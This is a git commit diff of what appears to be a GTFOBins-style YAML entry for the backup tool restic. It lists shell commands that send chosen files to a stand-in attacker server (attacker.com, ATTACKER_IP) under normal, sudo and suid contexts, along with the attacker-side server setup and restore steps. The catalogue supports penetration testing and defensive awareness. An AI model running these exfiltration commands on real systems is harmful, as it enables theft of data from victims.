Fix and improve restic

This commit is contained in:
Andrea Cardaci 2020-04-12 13:08:55 +02:00
parent 9ec96219a3
commit 7f6221646b

View File

@ -1,18 +1,41 @@
---
description: |
The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository:
```console
RPORT=12345
NAME=backup_name
./rest-server --listen ":$RPORT"
restic init -r "rest:http://localhost:$RPORT/$NAME"
```
To extract the data from the restic repository in the current directory on the attacker side:
```console
restic restore -r "/tmp/restic/$NAME" latest --target .
```
Upload data to the attacker server with the following commands.
functions:
file-upload:
- code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_or_dir_to_get
NAME=backup_name
restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
sudo:
- description: Restic can be used to backup files. Run the commands in the sequence given below.
code: |
<!-- Attacker Machine -->
rest-server --no-auth --listen http://ATTACKER_IP:PORT
<!-- Victim Machine -->
TARGET=rest_repository
BACKUP=file_or_directory_to_backup
sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
<!-- Attacker Machine -->
TARGET=rest_repository
DESTINATION=backup_to_restore
mkdir /tmp/restic/$DESTINATION
restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
- code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_or_dir_to_get
NAME=backup_name
sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
suid:
- code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_or_dir_to_get
NAME=backup_name
./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
---